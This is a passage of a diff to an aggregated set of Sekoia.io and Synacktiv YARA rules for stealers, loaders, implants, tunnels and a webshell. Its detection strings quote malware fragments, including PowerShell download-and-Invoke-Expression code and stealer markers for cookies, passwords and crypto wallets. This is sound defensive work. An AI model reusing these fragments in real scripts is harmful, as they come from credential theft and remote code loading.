+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_mars_stealer.yar#L3-L44"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b2b36a280c3c6cbbb8cbb9f1dd3eb48a4943ebbddb48eba2ac3d0db03924cafd"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2022-02-14"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "memory load plugin failed!" wide
-		$ = "Event eee!!!" ascii
-		$ = "LoadWin32_x64.pdb" ascii
+		$dec = {a3 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? 00 00 83 c4 ??}
+		$api00 = "LoadLibrary" ascii
+		$api01 = "GetProcAddress" ascii
+		$api02 = "ExitProcess" ascii
+		$api03 = "advapi32.dll" ascii
+		$api04 = "crypt32.dll" ascii
+		$api05 = "GetTickCount" ascii
+		$api06 = "Sleep" ascii
+		$api07 = "GetUserDefaultLangID" ascii
+		$api08 = "CreateMutex" ascii
+		$api09 = "GetLastError" ascii
+		$api10 = "HeapAlloc" ascii
+		$api11 = "GetProcessHeap" ascii
+		$api12 = "GetComputerName" ascii
+		$api13 = "VirtualProtect" ascii
+		$api14 = "GetUserName" ascii
+		$api15 = "CryptStringToBinary" ascii
+		$str0 = "JohnDoe" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and 2 of them
+		uint16( 0 ) == 0x5A4D and ( #dec > 400 and 12 of ( $api* ) and $str0 ) or for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == "LLCPPC" and pe.sections [ i ] . raw_data_size < 5000 )
 }
-rule SEKOIA_Bot_Win_Yamabot : FILE
+rule SEKOIA_Implant_Win_Quantum_Builder_Lnk
 {
 	meta:
-		description = "Detect the Yamabot implant used by Lazarus"
+		description = "Detect .LNK files created using Quantum Builder"
 		author = "Sekoia.io"
-		id = "9f5b85c4-59e3-448f-b054-5b4932ee89bb"
-		date = "2023-08-29"
+		id = "65f8a426-8bf3-4f7f-b7d2-fd8da5b660f7"
+		date = "2022-06-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/bot_win_yamabot.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "cb183cbf9703d96b5f463d635885eab66e0d36c4763752a5cb934538ada60ec3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_quantum_builder_lnk.yar#L1-L44"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dd090af0e062b633173ac8483d8659e1fd8aa7898c641714fbe4b30bdd276b3d"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 30
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f"
-		hash2 = "66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66"
-		hash3 = "74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643"
-		hash4 = "def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563"
 
 	strings:
-		$s1 = "_/D_/Bot/YamaBot/"
-		$s2 = "Go build ID: \"ujRRNborth3MgXzS7HTu/aYhLszO8_95srnr8Fk1n/Xr8P792kGZ_VUqOQVc97/kgx_H7YuMZBl2Ajyac2M\""
+		$magic_lnk = { 4C 00 00 00 01 14 02 00 }
+		$powershell_ascii = "\\WindowsPowerShell\\v1.0\\powershell.exe"
+		$powershell_wide = "powershell.exe" wide
+		$start = "<#" wide
+		$end = "#>" wide
+		$foreach = "=$Null;foreach(" wide
+		$return = "};return" wide
+		$char = "[char]" wide
+		$aes = "New-Object 'System.Security.Cryptography.AesManaged'" wide nocase
+		$base64 = "[System.Convert]::FromBase64String" wide nocase
+		$decryptor = "CreateDecryptor();" wide nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 1 of them and filesize > 3MB
+		$magic_lnk at 0 and all of ( $powershell* ) and ( $start and $end and $foreach and $return and $char or $aes and $base64 and $decryptor )
 }
-rule SEKOIA_Tool_Runpeinmemory_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Vbs_Downloader : FILE
 {
 	meta:
-		description = "Detects standard implementation of RunPEInMemory"
+		description = "Detects small VBS loader"
 		author = "Sekoia.io"
-		id = "64129ab0-b599-4760-ab21-20c475c2c07f"
-		date = "2024-05-23"
+		id = "13b63570-2f18-4b35-8087-9ab15c58a0d1"
+		date = "2023-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_runpeinmemory_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "154f3db98f8ee902ec7b58812525dbbef837ae30279c40b8d95ec93ae1260a69"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_vbs_downloader.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e3ae516ea18f2912b7f0fb7864542ae609167fb29751b87cbf6f9cd34ec858ba"
 		score = 75
-		quality = 80
+		quality = 68
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+] Fix Import Address Table"
-		$ = "[+] Relocation Fixed."
-		$ = "[+] File %s isn't a PE file."
+		$s1 = "on error resume next" nocase ascii wide
+		$s2 = "String('http" nocase ascii wide
+		$s3 = "send()" nocase ascii wide
+		$s4 = ")|Invoke-Expression" nocase ascii wide
+		$s5 = "'); Invoke-Expression $" nocase ascii wide
+		$s6 = "');Invoke-Expression $" nocase ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
+		$s1 and ( $s2 or $s3 ) and ( $s4 or $s5 or $s6 ) and filesize < 1KB
 }
-rule SEKOIA_Implant_Win_Geacon : FILE
+rule SEKOIA_Apt_Apt41_Powershell_Collection_Script : FILE
 {
 	meta:
-		description = "Finds Geacon samples based on specific strings"
+		description = "Detects PowerShell collection script"
 		author = "Sekoia.io"
-		id = "064eabe0-aee5-4e5e-9f5e-69b32b1ba0da"
-		date = "2024-01-11"
+		id = "55b6cc3e-24b2-4faa-a7fb-b4203a8e6d83"
+		date = "2023-11-15"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_geacon.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "74b0d2fbb8b7f6666543ba4fdfd9f9d2064d3a89d21c90d794b57f0009199fea"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt41_powershell_collection_script.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8b0462636c9f6270baff2bf09638e94db6d5a0472b8216ddd1919a77b6a63aca"
 		score = 75
-		quality = 80
+		quality = 70
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$gea01 = "geacon/config.init" ascii
-		$gea02 = "geacon_pro-master/config/config.go" ascii
-		$gea03 = "geacon_plus-main/config/config.go" ascii
-		$gea04 = "command type %d is not support by geacon now" ascii
-		$gea05 = "main/sysinfo.GeaconID" ascii
-		$str01 = "command.StealToken" ascii
-		$str02 = "command.MakeToken" ascii
-		$str03 = "command/misc.go" ascii
-		$str04 = "config/c2profile.go" ascii
-		$str05 = "crypt.AesCBCDecrypt" ascii
-		$str06 = "packet.File_Browse" ascii
-		$str07 = "packet.FirstBlood" ascii
-		$str08 = "packet.ParseCommandShell" ascii
-		$str09 = "packet.ParseCommandUpload" ascii
-		$str10 = "packet.PushResult" ascii
-		$str11 = "sysinfo.GetComputerName" ascii
-		$str12 = "sysinfo.IsOSX64" ascii
-		$str13 = "util..inittask" ascii
+		$ = "$yestoday.ToString(" ascii wide nocase
+		$ = "$m.LastAccessTime -" ascii wide nocase
+		$ = "$fmat=" ascii wide nocase
+		$ = "$computername" ascii wide nocase
+		$ = "Rar.exe" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
+		filesize < 10KB and all of them
 }
-rule SEKOIA_Apt_Muddywater_Powgoop_Loader : FILE
+rule SEKOIA_Implant_Any_Sliver : FILE
 {
 	meta:
-		description = "Detects the loader of PowGoop malware"
+		description = "Rule which detects any Sliver implant PE/Dlls/ELFs/MAC-O."
 		author = "Sekoia.io"
-		id = "716b45e1-9f17-4546-a003-a7c78340d623"
-		date = "2022-01-13"
+		id = "4b16f28a-2048-4044-8620-8e7a1651f2b1"
+		date = "2021-11-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_powgoop_loader.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "70f20928d2bbe081f0595ecdbb6dbe58a2f0807032598d88d829513e6d75287f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_any_sliver.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c7a2790fd13de0476cfe16ef26b2d4c8775f4f453d076c78975e2c372f03322c"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "$d.Add($in[$i]);" ascii wide
-		$s2 = "[System.Text.Encoding]::UTF8.GetString($o);" ascii wide
-		$s3 = "$i+=(1+1)" ascii wide
-		$t = { 24 ?? 3d [1-15] 20 24 ?? 3b ?? ?? ?? 20 24 ?? 3b }
+		$s1 = ").GetActiveC2" ascii
+		$s2 = ").GetVersion" ascii
+		$s3 = ").GetReconnectInterval" ascii
+		$s4 = ").GetProxyURL" ascii
+		$s5 = ").GetPollInterval" ascii
 
 	condition:
-		filesize < 50KB and ( 3 of ( $s* ) or $t in ( filesize -50 .. filesize ) )
+		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and ( true and filesize < 11MB and filesize > 7MB ) and ( all of ( $s* ) )
 }
-
-rule SEKOIA_Apt_Apt33_Tickler : FILE
+rule SEKOIA_Trojan_Win_Bbtok_Iso_Sep23 : FILE
 {
 	meta:
-		description = "Detects APT33 Tickler malware"
+		description = "Finds BBTok installation ISO file"
 		author = "Sekoia.io"
-		id = "e9ecf678-350c-47d2-ab4c-522974c70a45"
-		date = "2024-08-29"
+		id = "6032853d-b872-4b2e-913d-366e7f3d0f32"
+		date = "2023-09-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt33_tickler.yar#L4-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "8bd712b0a49f4fecd39d30ebd121832c"
-		hash = "3f29429fce0168748d7cc75e1478aedc"
-		logic_hash = "97b858819a1920e6dcdd1a9489754a948de8e6e39b4282e7fe4f6431617a9849"
+		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/trojan_win_bbtok_iso_sep23.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "140e83d2e0d012cdd5625ea89c3b3af05a80877cfc8215bbe20823e7e88c80b1"
+		logic_hash = "efef1e4e50d84cd30c025c86beb751c73a996cca896f90729571f48259ffc110"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$iso = {43 44 30 30 31}
+		$str01 = "POWERISO" ascii
+		$str02 = "%ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe" ascii wide
+		$str03 = ".pdf /Y & start" wide
+		$str04 = "\\MSBuild.exe -nologo \\\\" ascii wide
+
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( hash.md5 ( pe.rich_signature.clear_data ) == "2fe65623e6b22577516a4cd051ec3baa" or pe.imphash ( ) == "a5accd1a0d3eaf2c131bc662dd7ff8ea" )
+		all of them and filesize < 500KB
 }
-rule SEKOIA_Trojan_Win_Grandoreiro : FILE
+rule SEKOIA_Apt_Badmagic_Installpzz_Pshscript : FILE
 {
 	meta:
-		description = "Finds Grandorerio samples based on the specific strings"
+		description = "Detects BadMagic InstallPZZ powershell script"
 		author = "Sekoia.io"
-		id = "e48c86a1-e34f-4945-817a-9c85198a77bb"
-		date = "2022-08-24"
+		id = "d01bc217-9e14-498b-a92a-17f6aedec269"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/trojan_win_grandoreiro.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7424478b0cdfe922c2f98bf42e505f22fb0700cfeb54912630ce404c59b05c5e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_installpzz_pshscript.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "58256cffd1d5060769f304393c22b6488abe9515eb7df2a967ba2fed85a9ec9a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249681,32 +250158,26 @@ rule SEKOIA_Trojan_Win_Grandoreiro : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$mut = "ZTP@11" wide
-		$reg01 = "Software\\Embarcadero\\Locales" wide
-		$reg02 = "Software\\CodeGear\\Locales" wide
-		$reg03 = "Software\\Borland\\Locales" wide
-		$reg04 = "Software\\Borland\\Delphi\\Locale" wide
-		$reg05 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" wide
-		$str01 = "SELECT * FROM AntiVirusProduct" wide
-		$str02 = "GetTickCount64" wide
-		$str03 = "C:\\Program Files (x86)\\Embarcadero\\Studio\\20.0\\lib\\Clever Internet Suite" wide
-		$str04 = "{43826D1E-E718-42EE-BC55-A1E261C37BFE}" wide
+		$ = "start-job -ScriptBlock $script;"
+		$ = "Start-Sleep -Second 1;"
+		$ = "Write-Output \"$url$j"
+		$ = "Start-Sleep -Second 2;"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Apt_Andariel_Keylogger_Strings : FILE
+rule SEKOIA_Infostealer_Win_Leaf : FILE
 {
 	meta:
-		description = "Detects one of the Andariel keylogger"
+		description = "Find samples of Leaf Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "59e94bee-9bd4-4f72-9358-858956bb4787"
-		date = "2024-06-17"
+		id = "17d8e384-1092-4f27-b4f7-c0c0f7efcaa3"
+		date = "2023-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_andariel_keylogger_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "671698af4fbaed3d19f3d3498263183909db9422a5a0a8f12ba119409773c505"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_leaf.yar#L1-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f8c0ff694c9f7a02613000d85a40f6b400dcca60711e589f7ccd3546f571aea6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249714,18 +250185,33 @@ rule SEKOIA_Apt_Andariel_Keylogger_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Username:%s [%d/%02d/%02d %02d:%02d]" ascii fullword
-		$ = "-------[%d/%02d/%02d %02d:%02d]"
-		$ = "{Insert}"
+		$str01 = "Leaf $tealer" ascii
+		$str02 = "KiwiFolder" ascii
+		$str03 = "key_wordsFiles" ascii
+		$str04 = "**[Click to copy](https://superfurrycdn.nl/copy/" ascii
+		$str05 = "Early_Verified_Bot_Developer" ascii
+		$str06 = "getCookie.<locals>.<genexpr>" ascii
+		$str07 = "C:\\Program Files (x86)\\Steam\\config" ascii
+		$str08 = "[crunchyroll](https://crunchyroll.com)" ascii
+		$str09 = "-m pip install" ascii
+		$str10 = "taskkill /im " ascii
+		$str11 = "/loginusers.vdf" ascii
+		$str12 = "mot_de_passe" ascii
+		$str13 = "Interesting files found on user PC" ascii
+		$str14 = "NationsGlory/Local Storage/leveldb" ascii
+		$str15 = "wppassw.txt" ascii
+		$str16 = "wpcook.txt" ascii
+		$str17 = "ProcesName < 1 >" ascii
+		$str18 = "Metamask_" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 300KB and 2 of them
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
 /*
  * YARA Rule Set
  * Repository Name: Synacktiv
  * Repository: https://github.com/synacktiv/synacktiv-rules
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 81b4591c31165a77783671ea63d64ac79c2e84c7
  * Number of Rules: 3
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -249751,81 +250237,6 @@ If you use the Rules (including in modified form) on data, messages based on mat
 
 THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES.
  */
-rule SYNACKTIV_SYNACKTIV_HKTL_Tunnel_X64_GO_Iox_May25 : COMMODITY FILE
-{
-	meta:
-		description = "Detects the 64-bits version of the iox tunneling tool used for port forwarding and SOCKS5 proxy"
-		author = "Synacktiv, Maxence Fossat [@cybiosity]"
-		id = "0b5a4689-58ea-45d5-aa14-a1455276352a"
-		date = "2025-05-12"
-		modified = "2025-05-12"
-		reference = "https://www.synacktiv.com/en/publications/open-source-toolset-of-an-ivanti-csa-attacker"
-		source_url = "https://github.com/synacktiv/synacktiv-rules/blob/81b4591c31165a77783671ea63d64ac79c2e84c7/2025/offensive_tools/hktl_tunnel_x64_go_iox.yar#L1-L96"
-		license_url = "https://github.com/synacktiv/synacktiv-rules/blob/81b4591c31165a77783671ea63d64ac79c2e84c7/LICENSE.md"
-		hash = "0500c9d0b91e62993447cdcf5f691092aff409eca24080ce149f34e48a0445e0"
-		hash = "13c1cfb12017aa138e2f8d788dcd867806cc8fd6ae05c3ab7d886c18bcd4c48a"
-		hash = "1a9524a2c39e76e0ea85abba1f0ddddc5d0d0a3a601a1b75e8d224ad93968b5e"
-		hash = "1bd710dc054716bf5553abd05d282d9aeb7eb30a76320bd6be4ce2efc04b20bc"
-		hash = "2457a3241ec13c77b4132d6c5923e63b51a4d05a96dc0ae249c92a43ed9c7c04"
-		hash = "328570168780a5dd39e1b49db00430c02d3292ff1e8b14ff6aacce40d90d908f"
-		hash = "39d51ef91e189de44696ac67590b4251a6a320719668399127096dc57cbecba3"
-		hash = "4c4ec3314afe4284e4cf8bf2fdfb402820932ddcf16913a88a2b7c1d55a12a90"
-		hash = "4d1e87b372af0f52b9e2d7a2ac1d223575d29de5e3c0570a96b0d2ff346214f0"
-		hash = "4d49ceb20ad85b117dd30f317977526e73cb5dd622705277b5cbc691972abb4b"
-		hash = "5138090aee794a08de4b0482bbe58adbd918467d14dedf51961963b324e63f89"
-		hash = "63d32b6b29e5d4f8aab4b59681d853e481e858cbf1acfcb190469d8881f47aa6"
-		hash = "79d6dfacfa0e0e5bc48d8d894dae261b9412b9c04a39b6ebf992cb8a5a40de95"
-		hash = "82aec8846232a43a77e2b5c5a80de523b2c7f912d60bce3ac28242156395b9d0"
-		hash = "92cc697b909c398de8533499271c9d3c2425a71feaa0d70bac7428d90423ddff"
-		hash = "9e3cba612d5f69e27534e3d2ceb7bb6067d44ac93e5b1e74bf994a94dfd706b6"
-		hash = "a4139ffd12565edf5291dc5580a70e600f76695b03376e5c0130ade18a6a7bcd"
-		hash = "a8bda8e1d39ee61998381a2f0bfeb7069b19035551b8895eb48642bf98ade3d1"
-		hash = "aeddd8240c09777a84bb24b5be98e9f5465dc7638bec41fb67bbc209c3960ae1"
-		hash = "b9c40960259b9b14d80c8b1cb3438913f8550fe56dbdfe314b53c7ceae77ccb0"
-		hash = "c061952d49f03acf9e464ab927b0b6b3bc38da8caaf077e70ace77116b6d1b8c"
-		hash = "c1ca82411e293ec5d16a8f81ed9466972a8ead23bd4080aaf9505baccce575ba"
-		hash = "c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731"
-		hash = "c8b40fbb5cd27f42c143c35b67c700f7ea42a2084418c5e2da82fb0ac094f966"
-		hash = "d3190648bc428640a721b7d3c2b05c56e855355e8b44561e3b701e80e97f7ea7"
-		hash = "d879ff9275cd62f4e7935261e17461d3a3cd1a29d65a5688bd382c47ae680ad6"
-		hash = "d9e868af5567a8c823f48f0f30440f1a9d77b52b2e6d785e116c450c48df9fc6"
-		logic_hash = "adf3e21aa146b3def9baa73829126d8738db9cedb96e783a6baa589c77d7d518"
-		score = 75
-		quality = 80
-		tags = "COMMODITY, FILE"
-		license = "DRL-1.1"
-		tlp = "TLP:CLEAR"
-		pap = "PAP:CLEAR"
-
-	strings:
-		$expand_key = {
-            ( 48 8B 84 24 | 48 8B 9C 24 | 48 8B 8C 24 | 48 8B BC 24 | 48 8B B4 24 | 4C 8B 84 24 | 4C 8B 8C 24 | 4C 8B 94 24 | 4C 8B 9C 24 ) ?? ?? ?? ??
-            ( 48 83 F8 20 | 48 83 FB 20 | 48 83 F9 20 | 48 83 FF 20 | 48 83 FE 20 | 49 83 F8 20 | 49 83 F9 20 | 49 83 FA 20 | 49 83 FB 20 )
-            ( 0F 8D ?? ?? ?? ?? | 7D ?? )
-            ( 48 89 ?? | 49 89 ?? | 4C 89 ?? | 4D 89 ?? )
-            ( 48 83 E0 1F | 48 83 E3 1F | 48 83 E1 1F | 48 83 E7 1F | 48 83 E6 1F | 49 83 E0 1F | 49 83 E1 1F | 49 83 E2 1F | 49 83 E3 1F | 83 E0 1F | 83 E3 1F | 83 E1 1F | 83 E7 1F | 83 E6 1F | 41 83 E0 1F | 41 83 E1 1F | 41 83 E2 1F | 41 83 E3 1F )
-            ( 83 C0 E0 | 83 C3 E0 | 83 C1 E0 | 83 C7 E0 | 83 C6 E0 | 41 83 C0 E0 | 41 83 C1 E0 | 41 83 C2 E0 | 41 83 C3 E0 )
-            ( F7 D8 | F7 DB | F7 D9 | F7 DF | F7 DE | 41 F7 D8 | 41 F7 D9 | 41 F7 DA | 41 F7 DB )
-        }
-		$shuffle = {
-            ( 44 0F B6 04 | 44 0F B6 0C | 44 0F B6 14 | 44 0F B6 1C | 44 0F B6 44 | 44 0F B6 4C | 44 0F B6 54 | 44 0F B6 5C | 46 0F B6 04 | 46 0F B6 0C | 46 0F B6 14 | 46 0F B6 1C | 46 0F B6 44 | 46 0F B6 4C | 46 0F B6 54 | 46 0F B6 5C ) [1-2]
-            ( 45 0F AF C0 | 45 0F AF C1 | 45 0F AF C2 | 45 0F AF C3 | 45 0F AF C8 | 45 0F AF C9 | 45 0F AF CA | 45 0F AF CB | 45 0F AF D0 | 45 0F AF D1 | 45 0F AF D2 | 45 0F AF D3 | 45 0F AF D8 | 45 0F AF D9 | 45 0F AF DA | 45 0F AF DB | 44 0F AF C0 | 44 0F AF C1 | 44 0F AF C2 | 44 0F AF C3 | 44 0F AF C8 | 44 0F AF C9 | 44 0F AF CA | 44 0F AF CB | 44 0F AF D0 | 44 0F AF D1 | 44 0F AF D2 | 44 0F AF D3 | 44 0F AF D8 | 44 0F AF D9 | 44 0F AF DA | 44 0F AF DB )
-            [0-4]
-            ( 41 B8 | 41 B9 | 41 BA | 41 BB ) FF FF FF FF
-            ( 45 0F B6 C0 | 45 0F B6 C1 | 45 0F B6 C2 | 45 0F B6 C3 | 45 0F B6 C8 | 45 0F B6 C9 | 45 0F B6 CA | 45 0F B6 CB | 45 0F B6 D0 | 45 0F B6 D1 | 45 0F B6 D2 | 45 0F B6 D3 | 45 0F B6 D8 | 45 0F B6 D9 | 45 0F B6 DA | 45 0F B6 DB )
-            [0-4]
-            ( 41 89 D0 | 41 89 D1 | 41 89 D2 | 41 89 D3 | 89 D0 | 89 D1 | 89 D2 | 89 D3 )
-            31 D2
-            ( 66 41 F7 F0 | 66 41 F7 F1 | 66 41 F7 F2 | 66 41 F7 F3 )
-            ( 41 0F AF D0 | 41 0F AF D1 | 41 0F AF D2 | 41 0F AF D3 | 44 0F AF C2 | 44 0F AF CA | 44 0F AF D2 | 44 0F AF DA | 0F AF D0 | 0F AF D1 | 0F AF D2 | 0F AF D3 | 0F AF C2 | 0F AF CA | 0F AF D2 | 0F AF DA )
-            ( 31 ?? | 41 31 ?? | 44 31 ?? | 45 31 ?? )
-            ( 31 ?? | 41 31 ?? | 44 31 ?? | 45 31 ?? )
-            ( 44 88 04 ?F | 44 88 0C ?F | 44 88 14 ?F | 44 88 1C ?F | 44 88 04 ?7 | 44 88 0C ?7 | 44 88 14 ?7 | 44 88 1C ?7 | 88 04 ?F | 88 0C ?F | 88 14 ?F | 88 1C ?F | 88 04 ?7 | 88 0C ?7 | 88 14 ?7 | 88 1C ?7 | 44 88 04 3? | 44 88 0C 3? | 44 88 14 3? | 44 88 1C 3? | 88 04 3? | 88 0C 3? | 88 14 3? | 88 1C 3? )
-        }
-
-	condition:
-		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and filesize < 5MB and all of them
-}
 rule SYNACKTIV_SYNACKTIV_HKTL_Tunnel_GO_Iox_May25 : COMMODITY FILE
 {
 	meta:
@@ -249925,16 +250336,91 @@ rule SYNACKTIV_SYNACKTIV_WEBSHELL_ASPX_Suo5_May25 : WEBSHELL COMMODITY FILE
 		$s15 = "new Random().NextBytes(" ascii
 
 	condition:
-		filesize < 100KB and ( $user_agent or ( ( $header or $xor ) and 8 of ( $s* ) ) or 12 of ( $s* ) )
+		filesize < 100KB and ( $user_agent or ( ( $header or $xor ) and 8 of ( $s* ) ) or 12 of ( $s* ) )
+}
+rule SYNACKTIV_SYNACKTIV_HKTL_Tunnel_X64_GO_Iox_May25 : COMMODITY FILE
+{
+	meta:
+		description = "Detects the 64-bits version of the iox tunneling tool used for port forwarding and SOCKS5 proxy"
+		author = "Synacktiv, Maxence Fossat [@cybiosity]"
+		id = "0b5a4689-58ea-45d5-aa14-a1455276352a"
+		date = "2025-05-12"
+		modified = "2025-05-12"
+		reference = "https://www.synacktiv.com/en/publications/open-source-toolset-of-an-ivanti-csa-attacker"
+		source_url = "https://github.com/synacktiv/synacktiv-rules/blob/81b4591c31165a77783671ea63d64ac79c2e84c7/2025/offensive_tools/hktl_tunnel_x64_go_iox.yar#L1-L96"
